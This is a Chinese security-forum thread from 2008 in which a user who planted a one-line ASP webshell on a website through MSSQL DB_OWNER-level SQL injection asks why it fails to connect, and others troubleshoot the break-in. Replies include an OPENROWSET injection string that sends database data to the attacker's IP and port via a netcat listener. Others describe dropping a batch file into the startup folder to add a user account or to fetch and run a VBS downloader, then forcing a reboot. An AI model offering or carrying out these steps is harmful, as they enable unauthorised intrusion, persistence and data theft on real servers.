[讨论]MSSQL DB_OWNER权限请教高手(页 1) - 技术交流 - 【3.A.S.T】网络安全爱好者 -- 网络安全，势在必行

richy 发表于 2008-7-23 08:34

[讨论]MSSQL DB_OWNER权限请教高手

[讨论]MSSQL DB_OWNER权限请教高手
议题作者：哈破boy
信息来源：邪恶八进制信息安全团队（[url=http://www.eviloctal.com/]www.eviloctal.com[/url]）

MSSQL DB_OWNER 权限，网站路径已经找到，用工具写入了一句话木马Diy.asp。
在网站路径中也已经找到了写入的Diy.asp 。
但是，用一句话连接，就是显示该页无法显示。：（
这到底是什么原因？

我对照了网站的文件内容，和我找到的网站路径中的文件相符。
为什么我就是连不上我的一句话木马呢？永远为爱自己活者
帖子6 精华[url=http://forum.eviloctal.com/digest.php?authorid=153796]0[/url] 积分23 阅读权限40 性别男在线时间9 小时注册时间2007-12-24 最后登录2008-6-17 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=153796]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]

[url=http://forum.eviloctal.com/space-uid-13478.html]唐不狐[/url]
很黃很暴力
[img]http://forum.eviloctal.com/images/avatars/12.gif[/img]
晶莹剔透§烈日灼然

紫禁城 发表于 2008-7-23 08:34

先直接浏览器里打入地址确认文件成功写入到web目录并且能够正确运行
几种可能：
1.目录没有脚本执行权限。假如该目录已经存在asp文件，那么这个可能可排除。
2.你找的目录不对，可能是备份目录，不是真实目录。
3.diy.asp被杀。这个的话，可以随便写点东西上去看看能不能访问得到。
帖子145 精华[url=http://forum.eviloctal.com/digest.php?authorid=13478]2[/url] 积分574 阅读权限50 性别男来自china 在线时间107 小时注册时间2005-9-27 最后登录2008-7-21 [url=http://blog.wang1.cn]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=13478]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=猎头&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]您知道您年薪应是多少?[/url]

[url=http://forum.eviloctal.com/space-uid-136000.html]fucking[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

车亲仁 发表于 2008-7-23 08:34

除了楼上说的，还有就是有可能系统自生过滤了一些比如< %这些的符号。。。考虑用容错。。或加密。。。还有你还是先检查下备份后在相应的目录有没你所备份的asp文件。。。反正情况很多。。你的描述范围很广的说~~~
帖子28 精华[url=http://forum.eviloctal.com/digest.php?authorid=136000]0[/url] 积分103 阅读权限40 性别男在线时间124 小时注册时间2007-8-19 最后登录2008-6-6 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=136000]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=兼职&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]赚更多的钱[/url]

[url=http://forum.eviloctal.com/space-uid-6319.html]dingking[/url] [img]http://forum.eviloctal.com/customavatars/6319.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img]

yq_ryan 发表于 2008-7-23 08:34

先本地NC一个端口，然后执行如下代码。
复制内容到剪贴板
代码:
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=netpatch;Network=DBMSSOCN;Address=你的IP,端口;', 'select * from dest_table') select * from src_table;--
获得数据库服务器的IP，看看和WEB是一个服务器不。

[img]http://forum.eviloctal.com/images/smilies/yangcong/59.gif[/img]昨天是明天的前天今天是昨天的明天明天是昨天的后天 ╰o╯╰o╯
帖子741 精华[url=http://forum.eviloctal.com/digest.php?authorid=6319]2[/url] 积分4784 阅读权限100 性别男在线时间756 小时注册时间2005-6-17 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=6319]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-65725.html]龙歌[/url] [img]http://forum.eviloctal.com/images/avatars/pw/matrix2.jpg[/img]
晶莹剔透§烈日灼然

折翼天使 发表于 2008-7-23 08:34

多数是因为DB_OWNER 权限不够造成的！
帖子12 精华[url=http://forum.eviloctal.com/digest.php?authorid=65725]0[/url] 积分38 阅读权限40 性别男在线时间11 小时注册时间2006-10-5 最后登录2008-4-30 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=65725]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]

[url=http://forum.eviloctal.com/space-uid-6319.html]dingking[/url] [img]http://forum.eviloctal.com/customavatars/6319.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img]

charles_ho 发表于 2008-7-23 08:34

引用:
引用第4楼龙歌于2008-01-14 00:09发表的 :
多数是因为DB_OWNER 权限不够造成的！
权限？都写进文件去了。说明BAK权限是有滴。。。~~~
引用:
唐不狐:

先直接浏览器里打入地址确认文件成功写入到web目录并且能够正确运行几种可能： 1.目录没有脚本执行权限。假如该目录已经存在asp文件，那么这个可能可排除。 2.你找的目录不对，可能是备份目录，不是真实目录。 3.diy.asp被杀。这个的话，可以随便写点东西上去看看能不能访问得到。
1,BAK到可以解析的目录就OK

2,很有可能......也可能是WEB和数据库分离

3, 他的dir.asp是存在的，所以应该是没被杀。昨天是明天的前天今天是昨天的明天明天是昨天的后天 ╰o╯╰o╯
帖子741 精华[url=http://forum.eviloctal.com/digest.php?authorid=6319]2[/url] 积分4784 阅读权限100 性别男在线时间756 小时注册时间2005-6-17 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=6319]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=风水&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]良辰择日，预测咨询，公司改名，权威易经[/url]

[url=http://forum.eviloctal.com/space-uid-67853.html]jxsaqjh[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

吴福基 发表于 2008-7-23 08:34

很可能站库分离了jxsaqjh.cn
[url=http://wpa.qq.com/msgrd?V=1&Uin=75320216&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子36 精华[url=http://forum.eviloctal.com/digest.php?authorid=67853]0[/url] 积分99 阅读权限40 性别男在线时间15 小时注册时间2006-10-23 最后登录2008-4-9 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=67853]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]

[url=http://forum.eviloctal.com/space-uid-95849.html]冷了左眼[/url] [img]http://forum.eviloctal.com/images/avatars/pw/mon2.gif[/img]
晶莹剔透§烈日灼然

阿一发表于 2008-7-23 08:34

看看3389开了没有.如果开了直接备份一个bat 到系统启动目录下.前面加两回车.过滤掉无用的信息
bat的内容可以为开帐号.或者echo写一个VBS下载.再执行.然后.想办法让主机重启
帖子20 精华[url=http://forum.eviloctal.com/digest.php?authorid=95849]0[/url] 积分54 阅读权限40 性别男在线时间8 小时注册时间2007-3-24 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=95849]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-146932.html]hackwind[/url] [img]http://forum.eviloctal.com/images/avatars/01.gif[/img]
晶莹剔透§烈日灼然

dgbz 发表于 2008-7-23 08:34

这种情况我也遇到过。很有可能是马被杀掉的原因。
帖子13 精华[url=http://forum.eviloctal.com/digest.php?authorid=146932]0[/url] 积分39 阅读权限40 性别男来自幽谷客在线时间25 小时注册时间2007-11-4 最后登录2008-6-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=146932]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-117615.html]赤血狼[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

蓝色海洋 发表于 2008-7-23 08:34

应该WSH下看看！
帖子12 精华[url=http://forum.eviloctal.com/digest.php?authorid=117615]0[/url] 积分38 阅读权限40 在线时间140 小时注册时间2007-5-3 最后登录2008-7-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=117615]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-133110.html]miao2[/url]
﹎'颓废小猫;
[img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

技安发表于 2008-7-23 08:34

引用:
引用第7楼冷了左眼于2008-01-14 22:11发表的 :
看看3389开了没有.如果开了直接备份一个bat 到系统启动目录下.前面加两回车.过滤掉无用的信息
bat的内容可以为开帐号.或者echo写一个VBS下载.再执行.然后.想办法让主机重启
“前面加两回车.过滤掉无用的信息”怎么加回车?
我备份 'net user a a /add' 到web目录改名为.bat ，执行不了

输入行太长。

C:\Documents and Settings\et>net user

\\ET13 的用户帐户

--------------------------------------------------------
Administrator et Guest
HelpAssistant SUPPORT_388945a0
命令成功完成。
[url=http://wpa.qq.com/msgrd?V=1&Uin=308449635&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子26 精华[url=http://forum.eviloctal.com/digest.php?authorid=133110]2[/url] 积分89 阅读权限40 性别男在线时间102 小时注册时间2007-7-28 最后登录2008-7-19 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=133110]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-153502.html]56352351[/url] [img]http://forum.eviloctal.com/images/avatars/pw/eviloctal2.gif[/img]
晶莹剔透§烈日灼然

闲人发表于 2008-7-23 08:34

我遇到的问题和楼主差不多,
确定不是WEB数据库分离,
备分了马用列目录看了下的确好好的躺在那,
而且马的名字特别奇怪,不会有重名,
但是就是无法连接,访问的话无法显示
我遇到过好多次了,有次传了好几个马后终于成功,去目录下看以前的马都在啊,就是无法显示.我想问问这是什么原因啊?谁能回答我下,谢谢了.........没发贴权限,见谅.........
帖子13 精华[url=http://forum.eviloctal.com/digest.php?authorid=153502]0[/url] 积分48 阅读权限40 性别男在线时间17 小时注册时间2007-12-21 最后登录2008-5-3 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=153502]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-87852.html]魔王的徒弟[/url] [img]http://forum.eviloctal.com/images/avatars/pw/eviloctal2.gif[/img]
晶莹剔透§烈日灼然

狂野之城 发表于 2008-7-23 08:34

引用:
引用第4楼龙歌于2008-01-14 00:09发表的 :
多数是因为DB_OWNER 权限不够造成的！
个人觉得是权限不够
帖子9 精华[url=http://forum.eviloctal.com/digest.php?authorid=87852]0[/url] 积分59 阅读权限40 性别男在线时间11 小时注册时间2007-3-7 最后登录2008-7-15 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=87852]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-153502.html]56352351[/url] [img]http://forum.eviloctal.com/images/avatars/pw/eviloctal2.gif[/img]
晶莹剔透§烈日灼然

zh_Huang 发表于 2008-7-23 08:34

奇怪,问题是我的马放在那网站的根目录下的,他们主页我都可以浏览为什么小马就不可以.如果说是权限不够的话应该是全都不能浏览的啊
帖子13 精华[url=http://forum.eviloctal.com/digest.php?authorid=153502]0[/url] 积分48 阅读权限40 性别男在线时间17 小时注册时间2007-12-21 最后登录2008-5-3 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=153502]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-6319.html]dingking[/url] [img]http://forum.eviloctal.com/customavatars/6319.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img]

劲秋发表于 2008-7-23 08:34

不一定非要BAK马进去撒。你看看跑管理密码后台拿SHELL也行的嘛。

看看有没什么upfile.asp之类的上传文件利用下撒。~

你现在都不能确定是否是WEB和数据库分离的？昨天是明天的前天今天是昨天的明天明天是昨天的后天 ╰o╯╰o╯
帖子741 精华[url=http://forum.eviloctal.com/digest.php?authorid=6319]2[/url] 积分4784 阅读权限100 性别男在线时间756 小时注册时间2005-6-17 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=6319]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-25836.html]winger[/url] [img]http://forum.eviloctal.com/images/avatars/pw/male4.gif[/img]
晶莹剔透§烈日灼然

有心人 发表于 2008-7-23 08:34

碰到过这个问题
不是数据过滤
也不是数据库分离
那么多网站的目录把文件备份上去就看着在那里就是访问不了
每这个站下面的目录都试了就是不行

是不是和数据库权限有关系
？
[img]http://forum.eviloctal.com/images/smilies/yangcong/08.gif[/img]天空之翼谁曾纷飞
[url=http://wpa.qq.com/msgrd?V=1&Uin=292474745&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子6 精华[url=http://forum.eviloctal.com/digest.php?authorid=25836]0[/url] 积分105 阅读权限40 来自天堂在线时间29 小时注册时间2006-1-4 最后登录2008-7-14 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=25836]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-157752.html]hslyao[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

wahfen 发表于 2008-7-23 08:34

我有一个站。木录都没找到。。

是ASPX。。用ASPX暴目录工具也没有成功。。

这种能是目录分离吗。
帖子1 精华[url=http://forum.eviloctal.com/digest.php?authorid=157752]0[/url] 积分6 阅读权限40 性别男在线时间0 小时注册时间2008-1-25 最后登录2008-2-1 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=157752]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-39847.html]tj646[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

bimuyu 发表于 2008-7-23 08:35

先随便备份几个字母到TXT文件看能不能访问.
很有可能目录弄错了.
帖子5 精华[url=http://forum.eviloctal.com/digest.php?authorid=39847]0[/url] 积分20 阅读权限40 在线时间1 小时注册时间2006-3-19 最后登录2008-5-12 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=39847]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-14725.html]黄少[/url] [img]http://forum.eviloctal.com/images/avatars/pw/male1.gif[/img]
晶莹剔透§烈日灼然

qpqlqm6 发表于 2008-7-23 08:35

我碰到过，有防火墙拦截了。post不上不海洋之类的，可以试试，大牛lake2的一句话客户端。我从来不靠靠靠
[url=http://wpa.qq.com/msgrd?V=1&Uin=182245385&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子27 精华[url=http://forum.eviloctal.com/digest.php?authorid=14725]0[/url] 积分94 阅读权限40 在线时间29 小时注册时间2005-10-11 最后登录2008-7-21 [url=http://about:blank]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=14725]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-132139.html]mior[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

Esther 发表于 2008-7-23 08:35

mssql是以users权限启动的也会出现那样的问题
帖子5 精华[url=http://forum.eviloctal.com/digest.php?authorid=132139]0[/url] 积分9 阅读权限40 在线时间4 小时注册时间2007-7-20 最后登录2008-6-25 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=132139]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-10282.html]皇子[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

yoncom 发表于 2008-7-23 08:35

[quote]原帖由 miao2 于 2008-1-17 23:10 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=107770&ptid=31904][img]http://forum.eviloctal.com/images/common/back.gif[/img][/url]

“前面加两回车.过滤掉无用的信息”怎么加回车?
我备份 'net user a a /add' 到web目录改名为.bat ，执行不了

输入行太长。

你insert内容到表里的时候先写个0X0A0D 然后第一句要执行的命令然后再加个0A0D
异词类推
帖子61 精华[url=http://forum.eviloctal.com/digest.php?authorid=10282]0[/url] 积分206 阅读权限40 在线时间6 小时注册时间2005-8-21 最后登录2008-6-20 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=10282]查看详细资料[/url]TOP

[url=http://forum.eviloctal.com/space-uid-103889.html]join[/url] [img]http://forum.eviloctal.com/customavatars/103889.jpg[/img]
晶莹剔透§烈日灼然

页: [1]

【3.A.S.T】网络安全爱好者's Archiver

[讨论]MSSQL DB_OWNER权限 请教高手

[讨论]MSSQL DB_OWNER权限请教高手